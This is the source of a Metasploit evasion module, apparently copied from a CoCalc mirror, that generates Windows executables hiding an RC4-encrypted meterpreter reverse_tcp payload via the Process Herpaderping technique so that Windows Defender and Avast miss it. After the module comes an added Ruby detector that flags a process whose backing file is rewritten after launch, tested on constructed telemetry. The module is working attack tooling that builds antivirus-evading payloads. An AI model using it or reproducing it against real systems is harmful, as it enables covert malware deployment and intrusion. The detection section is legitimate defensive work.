CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/evasion/windows/process_herpaderping.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/compiler/windows'

class MetasploitModule < Msf::Evasion

  # These constants must match the constants defined in the PE loader code (ProcessHerpaderpingTemplate.cpp)
  MAX_JUNK_SIZE = 1024
  MAX_PAYLOAD_SIZE = 8192
  MAX_KEY_SIZE = 64

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Process Herpaderping evasion technique',
        'Description' => %q{
          This module allows you to generate a Windows executable that evades security
          products such as Windows Defender, Avast, etc. This uses the Process
          Herpaderping technique to bypass Antivirus detection. This method consists in
          obscuring the behavior of a running process by modifying the executable on disk
          after the image has been mapped in memory (more details https://jxy-s.github.io/herpaderping/).

          First, the chosen payload is encrypted and embedded in a loader Portable
          Executable (PE) file. This file is then included in the final executable. Once
          this executable is launched on the target, the loader PE is dropped on disk and
          executed, following the Process Herpaderping technique. Note that the name of
          the file that is being dropped is randomly generated. However, it is possible
          to configure the destination path from Metasploit (see WRITEABLE_DIR option
          description).

          Here is the main workflow:
          1. Retrieve the target name (where the PE loader will be dropped).
          2. Retrieve the PE loader from the binary and write it on disk.
          3. Create a section object and create a process from the mapped image.
          4. Modify the file content on disk by copying another (inoffensive) executable
             or by using random bytes (see REPLACED_WITH_FILE option description).
          5. Create the main Thread.

          The source code is based on Johnny Shaw's PoC (https://github.com/jxy-s/herpaderping).
        },
        'Author' => [
          'Johnny Shaw', # Research and PoC
          'Christophe De La Fuente' # MSF Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://jxy-s.github.io/herpaderping/' ],
          [ 'URL', 'https://github.com/jxy-s/herpaderping' ],
        ],
        'Platform' => 'windows',
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Payload' => { 'ForceEncode' => true },
        'Targets' => [
          [
            'Microsoft Windows (x64)',
            {
              'Arch' => ARCH_X64,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Microsoft Windows (x86)',
            {
              'Arch' => ARCH_X86,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
              }
            }
          ]
        ]
      )
    )

    register_options([
      OptString.new('ENCODER', [
        false,
        'A specific encoder to use (automatically selected if not set)',
        nil
      ]),
      OptString.new('WRITEABLE_DIR', [
        true,
        'Where to write the loader on disk',
        '%TEMP%'
      ]),
      OptString.new('REPLACED_WITH_FILE', [
        false,
        'File to replace the target with. If not set, the target file will be '\
        'filled with random bytes (WARNING! it is likely to be caught by AV).',
        '%SystemRoot%\\System32\\calc.exe'
      ])
    ])
  end

  # Overwrite the placeholder tag in `bin` (in place) with `value`; the templates
  # reserve enough room after each tag for the largest value the constants allow.
  def patch_binary(bin, tag, value)
    placeholder = bin.index(tag)
    unless placeholder
      fail_with(Failure::BadConfig, "Invalid source binary: missing \"#{tag}\" tag")
    end

    bin[placeholder, value.size] = value
    nil
  end

  # RC4-encrypt the encoded payload, padded with random junk so its size varies.
  def encrypt_payload
    opts = { format: 'rc4', key: rc4_key }
    junk = Rex::Text.rand_text(10..MAX_JUNK_SIZE)
    p = payload.encoded + junk
    vprint_status("Payload size: #{p.size} = #{payload.encoded.size} + #{junk.size} (junk)")
    Msf::Simple::Buffer.transform(p, 'raw', nil, opts)
  end

  def rc4_key
    @rc4_key ||= Rex::Text.rand_text_alpha(32..MAX_KEY_SIZE)
  end

  def run
    case target.arch.first
    when ARCH_X64
      arch_suffix = 'x64'
    when ARCH_X86
      arch_suffix = 'x86'
    end

    payload = generate_payload
    if payload.encoded.size > MAX_PAYLOAD_SIZE
      fail_with(Failure::BadConfig,
                "Payload too big: #{payload.encoded.size} bytes (max: #{MAX_PAYLOAD_SIZE})")
    end

    base_path = ::File.join(
      Msf::Config.data_directory,
      'evasion',
      'windows',
      'process_herpaderping'
    )
    exe_path = ::File.join(base_path, "ProcessHerpaderping_#{arch_suffix}.exe")
    exe_path = ::File.expand_path(exe_path)
    pe = File.binread(exe_path)
    vprint_status("Using #{exe_path}")

    template_path = ::File.join(base_path, "ProcessHerpaderpingTemplate_#{arch_suffix}.exe")
    template_path = ::File.expand_path(template_path)
    payload_pe = File.binread(template_path)
    vprint_status("Using #{template_path}")

    patch_binary(payload_pe, 'ENCKEY', rc4_key)

    vprint_status("RC4 key: #{rc4_key}")

    encrypted_payload = encrypt_payload
    vprint_status("Encrypted payload size: #{encrypted_payload.size}")

    # The loader reads a little-endian 32-bit length followed by the ciphertext.
    size_prefix = [encrypted_payload.size].pack('L<')
    patch_binary(payload_pe, 'PAYLOAD', (size_prefix + encrypted_payload).b)
    vprint_status("Payload PE size #{payload_pe.size}")

    patch_binary(pe, 'PAYLOAD', payload_pe)

    target_file_name = Rex::Text.rand_text_alpha_lower(4..10)
    # Work on a copy so the `<<` calls below do not mutate the datastore value across runs.
    target_path = datastore['WRITEABLE_DIR'].dup
    target_path << '\\' if target_path.last != '\\'
    target_path << target_file_name
    target_path << '.exe'
    patch_binary(pe, 'TARGETFILENAME', target_path.b)
    vprint_status("Target filename will be #{target_path}")

    replace_path = datastore['REPLACED_WITH_FILE']
    if replace_path.nil? || replace_path.empty?
      replace_path = "\0"
    end

    patch_binary(pe, 'REPLACEFILENAME', replace_path.b)

    file_create(pe)
    if arch_suffix == 'x86'
      print_warning(
        "#### WARNING ####\n"\
        "This payload won't work on 32-bit Windows 10 versions from 1511 (build\n"\
        "10586) to 1703 (build 15063), including Windows 10 2016 LTSB (build 14393).\n"\
        "These versions have a bug in the kernel that crashes/BugCheck the OS\n"\
        "when executing this payload. So, to avoid this, the payload won't run if\n"\
        'it detects the OS is one of these versions.'
      )
    end
  end
end
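The module's description states the observable that defenders can key on: a process is created from a mapped image, and the file backing that image is then rewritten on disk (step 3 followed by step 4), so what runs no longer matches what is on disk. The Ruby below is an added detection example written for this page; it is not part of the module or of metasploit-framework. The event records and their field names (`type`, `path`, `pid`, `sha256`) are a constructed, product-neutral schema standing in for endpoint telemetry, and the "random short name in a Temp directory" heuristic is derived from the module's own `rand_text_alpha_lower(4..10)` + `.exe` under `%TEMP%`; the 60-second window and severity labels are assumptions.

```ruby
require 'digest'
require 'time'

# Constructed sample telemetry (not real logs). Each record is one endpoint event;
# the schema is an assumption for this example, not any vendor's format.
EVENTS = [
  { time: '2024-01-01T10:00:00Z', type: 'file_write',     path: 'C:\\Users\\u\\AppData\\Local\\Temp\\qzrt.exe', sha256: 'aaa1' },
  { time: '2024-01-01T10:00:01Z', type: 'process_create', path: 'C:\\Users\\u\\AppData\\Local\\Temp\\qzrt.exe', pid: 4242, sha256: 'aaa1' },
  # The backing file is rewritten one second after the process was created from it.
  { time: '2024-01-01T10:00:02Z', type: 'file_write',     path: 'C:\\Users\\u\\AppData\\Local\\Temp\\qzrt.exe', sha256: 'bbb2' },
  # Benign control: an installer writes a file and launches it, with no later rewrite.
  { time: '2024-01-01T10:05:00Z', type: 'file_write',     path: 'C:\\Program Files\\App\\app.exe', sha256: 'ccc3' },
  { time: '2024-01-01T10:05:01Z', type: 'process_create', path: 'C:\\Program Files\\App\\app.exe', pid: 5151, sha256: 'ccc3' }
].freeze

WINDOW_SECONDS = 60                      # assumption: how long after start a rewrite is suspicious
TEMP_DIR_RE = %r{\\temp\\}i              # path passes through a Temp directory
RANDOM_NAME_RE = /\A[a-z]{4,10}\.exe\z/  # mirrors the module's rand_text_alpha_lower(4..10) + '.exe'

# Core indicator: the image file was written, with different content, after a
# process had already been created from it.
def image_rewritten_after_start(events, window = WINDOW_SECONDS)
  findings = []
  sorted = events.sort_by { |e| Time.iso8601(e[:time]) }
  sorted.each do |proc_ev|
    next unless proc_ev[:type] == 'process_create'
    started = Time.iso8601(proc_ev[:time])
    sorted.each do |w|
      next unless w[:type] == 'file_write' && w[:path].casecmp?(proc_ev[:path])
      t = Time.iso8601(w[:time])
      next if t <= started || t - started > window   # only writes after start, inside the window
      next if w[:sha256] == proc_ev[:sha256]          # same bytes rewritten: no mismatch
      findings << {
        pid: proc_ev[:pid], path: proc_ev[:path],
        mapped_sha256: proc_ev[:sha256], disk_sha256: w[:sha256],
        seconds_after_start: (t - started).round
      }
    end
  end
  findings
end

# Secondary heuristic from the module's defaults: short random lowercase name in Temp.
# Legitimate installers also drop files there, so this only raises severity.
def looks_like_dropped_loader?(path)
  name = path.split('\\').last
  path.match?(TEMP_DIR_RE) && name.match?(RANDOM_NAME_RE)
end

def triage(events)
  image_rewritten_after_start(events).map do |f|
    f.merge(severity: looks_like_dropped_loader?(f[:path]) ? 'high' : 'medium')
  end
end

# Forensic follow-up: compare a dumped process image with the file currently on disk.
def mapped_image_matches_disk?(mapped_bytes, disk_bytes)
  Digest::SHA256.hexdigest(mapped_bytes) == Digest::SHA256.hexdigest(disk_bytes)
end

if __FILE__ == $PROGRAM_NAME
  triage(EVENTS).each { |f| puts "#{f[:severity]}: pid #{f[:pid]} #{f[:path]} rewritten #{f[:seconds_after_start]}s after start" }
end
```

On the constructed events only pid 4242 is reported, rated high because its image sits in Temp with a four-letter name; the installer control is silent because its file is never rewritten after launch. The hash comparison is the decisive signal; the name heuristic is there to rank, not to decide.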